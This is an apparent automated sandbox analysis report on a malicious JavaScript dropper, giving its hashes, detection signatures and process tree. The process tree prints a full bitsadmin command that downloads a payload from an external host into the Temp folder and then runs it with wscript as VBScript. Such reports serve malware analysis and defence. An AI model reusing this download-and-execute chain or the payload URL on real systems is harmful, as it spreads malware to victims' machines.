Analysis
-
max time kernel
121s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
28-08-2024 18:19
Static task
static1
Behavioral task
behavioral1
Sample
New_Document-#3765618.js
Resource
win7-20240708-en
4 signatures
150 seconds
General
-
Target
New_Document-#3765618.js
-
Size
441KB
-
MD5
c7e47553b94c0d18ecf9e03b5ffec68b
-
SHA1
bfb60db9ad9e0bd41ee2335acaa6316264c0b638
-
SHA256
8ed7810c7c48d274f4b845cb155ab61af9ac0297fceb2f356ad5557434977b5a
-
SHA512
5a624285b1d9179939495c0f2baa4ecfb7cc9561098977be825ab83b6c90d5e86b4571f5cfa603d9e5e2be76b8e84153a607f26b4263cbff908bb5aca2201194
-
SSDEEP
384:JeeeeeeeeeeeRReeeeeeeeeeeReeeeeeeeeeezeeeeeeeeeee8eeeeeeeeeeeRe4:Heo
Malware Config
Signatures
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
wscript.exedescription pid process target process PID 1488 wrote to memory of 2304 1488 wscript.exe bitsadmin.exe PID 1488 wrote to memory of 2304 1488 wscript.exe bitsadmin.exe PID 1488 wrote to memory of 2304 1488 wscript.exe bitsadmin.exe PID 1488 wrote to memory of 2708 1488 wscript.exe wscript.exe PID 1488 wrote to memory of 2708 1488 wscript.exe wscript.exe PID 1488 wrote to memory of 2708 1488 wscript.exe wscript.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\New_Document-#3765618.js1⤵
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Windows\System32\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/mes/010111100110101101001111111101011011100101011110 C:\Users\Admin\AppData\Local\Temp\pmqfgkdqzsbsvsamfrryrizflqdvvwqqctmqvepuyuplixbkjbforifcqtpxeylsnfsloatiuqykwi2⤵
- Download via BitsAdmin
PID:2304 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\Admin\AppData\Local\Temp\pmqfgkdqzsbsvsamfrryrizflqdvvwqqctmqvepuyuplixbkjbforifcqtpxeylsnfsloatiuqykwi2⤵PID:2708